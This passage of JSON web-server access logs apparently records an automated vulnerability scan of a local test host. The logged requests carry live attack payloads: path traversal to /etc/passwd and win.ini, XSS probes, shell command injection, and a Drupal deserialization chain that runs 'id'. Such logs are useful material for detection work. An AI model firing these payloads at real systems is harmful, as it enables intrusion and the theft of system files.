/wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hub/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translate.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /standard/default.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\x22>&id=3&nsvpx=phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/userportal/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/showLogon.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dotAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/webadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"{ \x22link\x22: [ { \x22value\x22: \x22link\x22, \x22options\x22: \x22O:24:\x5C\x22GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5C\x22:2:{s:33:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5Cu0000methods\x5C\x22;a:1:{s:5:\x5C\x22close\x5C\x22;a:2:{i:0;O:23:\x5C\x22GuzzleHttp\x5C\x5CHandlerStack\x5C\x22:3:{s:32:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000handler\x5C\x22;s:2:\x5C\x22id\x5C\x22;s:30:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000stack\x5C\x22;a:1:{i:0;a:1:{i:0;s:6:\x5C\x22system\x5C\x22;}}s:31:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000cached\x5C\x22;b:0;}i:1;s:7:\x5C\x22resolve\x5C\x22;}}s:9:\x5C\x22_fn_close\x5C\x22;a:2:{i:0;r:4;i:1;s:7:\x5C\x22resolve\x5C\x22;}}\x22 } ], \x22_links\x22: { \x22type\x22: { \x22href\x22: \x22http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\x22 } } }","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /node/1?_format=hal_json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/portalhelp/en/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v3/settings/first-login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?{alert(1)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre=29K6BaoUwd2bQOHGM6YFpKv6m6o HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%3B/monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile 